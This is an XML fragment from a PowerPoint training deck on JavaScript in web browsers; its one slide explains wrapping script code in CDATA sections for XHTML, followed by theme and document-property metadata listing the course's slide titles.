            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In XHTML, the content of a &lt;script&gt; element is treated like any other content. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>It </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>is best to put all JavaScript code within a CDATA section if you are using XHTML</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="715627" y="2105145"/>
            <a:ext cx="5989175" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="808080"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>// Your JavaScript code goes here</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="808080"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Lucida Console"/>
              <a:cs typeface="Lucida Console"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="715628" y="4660500"/>
            <a:ext cx="6712911" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>&gt;&lt;![CDATA[</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="808080"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>// Your JavaScript code goes here</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="808080"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>]]&gt;&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3856227393"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/theme/theme1.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="luxoft-corporate-ppt-template">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luxoft-template-v3.4" id="{F0BBB28C-EED3-4C9E-AC46-0A2469816214}" vid="{F7716D20-A5D3-4677-B270-2AEEC011A1D9}"/>
    </a:ext>
  </a:extLst>
</a:theme>
</file>

<file path=ppt/theme/theme2.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="Luxoft: Computer / TV">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ln>
              <a:noFill/>
            </a:ln>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luxoft-template-v3.4" id="{F0BBB28C-EED3-4C9E-AC46-0A2469816214}" vid="{37383A5C-C4E3-4CA0-9820-12933A0EA401}"/>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luxoft-corporate-ppt-template</Template>
  <TotalTime>2706</TotalTime>
  <Words>2263</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>155</Paragraphs>
  <Slides>28</Slides>
  <Notes>0</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luxoft-corporate-ppt-template</vt:lpstr>
      <vt:lpstr>Luxoft: Computer / TV</vt:lpstr>
      <vt:lpstr>WEB-007 JavaScript</vt:lpstr>
      <vt:lpstr>WEB-007 JavaScript</vt:lpstr>
      <vt:lpstr>JavaScript in Web browser</vt:lpstr>
      <vt:lpstr>JavaScript role in Web</vt:lpstr>
      <vt:lpstr>JavaScript role in Web</vt:lpstr>
      <vt:lpstr>window object as a global context</vt:lpstr>
      <vt:lpstr>window object as a global context</vt:lpstr>
      <vt:lpstr>Embedding JavaScript into HTML</vt:lpstr>
      <vt:lpstr>Embedding JavaScript into HTML</vt:lpstr>
      <vt:lpstr>Embedding JavaScript into HTML</vt:lpstr>
      <vt:lpstr>Embedding JavaScript into HTML</vt:lpstr>
      <vt:lpstr>Embedding JavaScript into HTML</vt:lpstr>
      <vt:lpstr>Embedding JavaScript into HTML</vt:lpstr>
      <vt:lpstr>Embedding JavaScript into HTML</vt:lpstr>
      <vt:lpstr>Embedding JavaScript into HTML</vt:lpstr>
      <vt:lpstr>Embedding JavaScript into HTML</vt:lpstr>
      <vt:lpstr>Execution of JavaScript Programs</vt:lpstr>
      <vt:lpstr>Execution of JavaScript Programs</vt:lpstr>
      <vt:lpstr>Execution of JavaScript Programs</vt:lpstr>
      <vt:lpstr>Execution of JavaScript Programs</vt:lpstr>
      <vt:lpstr>JavaScript Security</vt:lpstr>
      <vt:lpstr>JavaScript Security</vt:lpstr>
      <vt:lpstr>JavaScript Security</vt:lpstr>
      <vt:lpstr>JavaScript Security</vt:lpstr>
      <vt:lpstr>JavaScript Security</vt:lpstr>
      <vt:lpstr>JavaScript Security</vt:lpstr>
      <vt:lpstr>JavaScript Security</vt:lpstr>
      <vt:lpstr>JavaScript in Web browser</vt:lpstr>
    </vt:vector>
  </TitlesOfParts>
  <Company>Luxoft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Polish Labor Law</dc:title>
  <dc:creator>Sawicka - Kucharska, Joanna</dc:creator>
  <cp:lastModifiedBy>Mikhail Vaisman</cp:lastModifiedBy>
  <cp:revision>181</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2014-06-05T10:48:46Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2015-05-13T23:03:01Z</dcterms:modified>
</cp:coreProperties>
</file>